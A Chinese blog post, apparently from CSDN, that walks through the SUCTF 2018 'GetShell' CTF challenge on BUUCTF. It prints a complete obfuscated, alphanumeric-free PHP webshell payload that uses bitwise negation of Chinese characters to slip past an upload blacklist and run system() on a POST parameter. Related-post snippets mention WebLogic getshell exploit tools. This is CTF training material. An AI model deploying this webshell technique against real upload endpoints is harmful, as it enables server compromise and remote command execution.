buuctf-web-[SUCTF 2018]GetShell1

最新推荐文章于 2024-05-15 09:16:34 发布
最新推荐文章于 2024-05-15 09:16:34 发布
阅读量331 收藏 1
点赞数 1
分类专栏: ctf buuctfweb 网络安全 文章标签: 服务器 php 安全 网络安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/129475399
版权
ctf 同时被 3 个专栏收录
70 篇文章 2 订阅
订阅专栏
网络安全
30 篇文章 0 订阅
订阅专栏
buuctfweb
28 篇文章 0 订阅
订阅专栏

不用多说,文件上传,打开环境

只有一个主界面和文件上传界面

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
}

没写禁止哪些参数,fuzz一下

发现~可以利用

使用的是位运算里的“取反”。

利用的是UTF-8编码的某个汉字,并将其中某个字符取出来,比如'和'{2}的结果是"\x8c",其取反即为字母s

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

构造payload为

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

修改文件内容为以上代码

查看上传上去的文件,发现可解析

对a参数传参env

得到flag

flag{49d1b01a-8bd2-462e-bcdb-e50a5498a5f1}

mlws1900
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4287
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
2018SUCTF Getshell特殊字符shell
a3320315的博客
02-09 1799
0x01 源码 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal ...
2024年最新CTF利用大佬们的webshell拿取flag_ctf留言板获取flag(1),Golang系统面试题
最新发布
2401_84924864的博客
05-15 463
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。但唯一发现了一个zb.php无疑是个webshell。本来想把图片下载下来,看看一些大佬上传的图片马密码。需要的话可以点击**
BUUCTF--[SUCTF 2018]GetShell
qq_46263951的博客
07-17 450
$_=[]; //array $__=$_.$_; /arrayarray $_=($_==$__);//$_=(array==arrayarray) false 0 $__=($_==$_);//$__=(array==array) true 1 echo ~茉[$____];//s echo ~内[$____];//y echo ~茉[$____];//s echo ~苏[$____];//t echo ~的[$____];//e echo ~咩[$____];//m echo ~课[$__...
[SUCTF 2018]GetShell
qq_43801002的博客
07-27 1348
题目 过程 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 发现可以上传php文件,访问过后发现,直
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1815
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过操纵这些请求参数来覆盖预定义的变量,...
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
cve-2018-2628 exp getshell
05-21
【标题】"CVE-2018-2628 EXP Getshell" 是一个与网络安全相关的主题,涉及到了一个特定的漏洞利用(Exploit)和获取远程 shell 的技术。CVE(Common Vulnerabilities and Exposures)是用于识别安全漏洞的全球唯一...
CVE-2018-2628-检测与getshell工具-含使用说明书.zip
12-03
CVE-2018-2628-检测与getshell工具-含使用说明书,属于WebLogic 反序列化远程代码执行漏洞。
用于验证用户权限的 actix-web 扩展
06-28
#[get("/secure" )]#[has_permissions("OP_READ_SECURED_INFO" )]asyncfnmacro_secured () -> HttpResponse { HttpResponse::Ok ().body ("ADMIN_RESPONSE" )}Guard方式保护示例use actix_web_grants:: {Permission...
BUUCTF-wustctf2020_getshell1
Rt1Text的博客
12-04 185
这题没有什么过多解释的,就是一道简单的ret2text,有shell的地址应该是太简单了做的人少就放在了BUUCTF的第二页,按照顺序做的,也就写上了
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 621
[buuctf]wustctf2020_getshell
buuctf ---- getshell集合(未完)
L0g1c的博客
01-27 3627
buuctf ----- jarvisoj_tell_me_something 运行程序得 使用64IDA查看程序 可以看到存在溢出漏洞 查看字符串,发现flag.txt 存在后门函数,该函数的含义是输出flag 思路:改变ret addr 为good_game函数的地址。 编写exp from pwn import* io = remote("node4.buuoj.cn",29817) bin_addr = 0x400620 payload = 'a'*0x8c+p64(bin_addr)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值